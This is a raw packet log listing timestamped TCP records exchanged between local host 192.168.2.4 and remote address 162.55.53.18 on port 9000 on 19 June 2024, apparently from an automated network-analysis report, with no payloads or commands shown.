Jun 19, 2024 14:40:14.645201921 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645201921 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645222902 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645304918 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645322084 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645376921 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645382881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645402908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645416975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645433903 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645447969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645448923 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645464897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645483017 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645492077 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645492077 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645502090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645515919 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645550013 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645745039 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645759106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645776987 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645802975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645829916 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645864010 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645879984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645905018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645924091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735505104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735529900 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735539913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735548973 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735645056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735665083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735691071 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735711098 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735713959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735730886 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735752106 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735773087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735785007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735822916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735826015 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735838890 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735862970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735899925 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735918045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735934019 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735959053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735959053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735980034 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.735980988 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735997915 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.735999107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736016989 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.736030102 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.736138105 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736155033 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736170053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736186028 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736196041 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.736221075 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.736310959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736326933 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736341953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.736351967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.736375093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.736388922 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040170908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040194988 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040226936 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040244102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040247917 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040247917 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040258884 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040287971 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040307045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040328026 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040328026 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040328026 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040328026 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040359974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040380001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040395021 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040410995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040425062 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040426016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040451050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040611982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040627956 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040643930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040659904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040694952 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040694952 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040920973 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040946007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040961027 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040976048 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.040980101 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.040992022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041016102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041033983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041034937 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041035891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041035891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041052103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041066885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041074991 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041083097 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041090965 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041102886 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041107893 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041122913 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041138887 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041157961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041436911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041451931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041465998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041481018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041481972 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041501045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041507959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041517973 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041529894 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041534901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041552067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041552067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041568995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041578054 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041584969 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041594982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041608095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041620970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041629076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041647911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041651964 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041675091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041678905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041696072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041696072 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041712046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041722059 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041729927 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041743040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041745901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041763067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041764975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041780949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041783094 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041798115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041801929 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041812897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041821957 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041841984 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041851997 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.041861057 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.041894913 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042129040 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042144060 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042157888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042179108 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042184114 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042196035 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042207956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042224884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042227030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042243004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042258024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042273998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042282104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042282104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042282104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042299986 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042316914 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042320013 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042320013 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042332888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042340994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042351007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042361975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042367935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042378902 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042386055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042396069 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042402983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042416096 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042419910 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042433023 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042438030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042450905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042454004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042469025 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042470932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042486906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042488098 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042500973 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042509079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042516947 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.042536020 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.042562962 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101495028 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101517916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101536036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101556063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101571083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101588964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101598024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101598024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101612091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101619005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101705074 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101718903 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101733923 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101749897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101763964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101771116 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101771116 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101780891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101783037 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101821899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101821899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101833105 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101860046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101881981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101897001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101905107 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101913929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101917028 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101931095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.101933956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101949930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.101963043 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102157116 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102173090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102220058 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102231026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102247953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102264881 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102264881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102272987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102284908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102307081 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102322102 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102361917 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102376938 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102410078 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102420092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102433920 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.102458000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.102477074 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192293882 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192321062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192353010 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192362070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192368984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192385912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192401886 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192401886 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192401886 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192420006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192425966 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192435980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192449093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192465067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192538977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192564011 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192579031 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192584991 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192612886 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192630053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192647934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192662954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192677975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192688942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192693949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192707062 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192711115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192723036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192743063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192754984 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192801952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192816973 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192832947 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192842007 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192858934 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192858934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192868948 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192876101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192898035 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192898035 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192917109 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192918062 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192931890 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.192950964 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192984104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.192984104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.193391085 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.193404913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.193419933 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.193434954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.193443060 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.193466902 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.193500996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283129930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283183098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283207893 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283224106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283224106 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283224106 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283248901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283267021 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283284903 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283333063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283333063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283333063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283334017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283334017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283358097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283376932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283416033 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283416033 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283448935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283463955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283479929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:15.283493996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:15.283509016 CEST	49748	9000	192.168.2.4	162.55.53.18
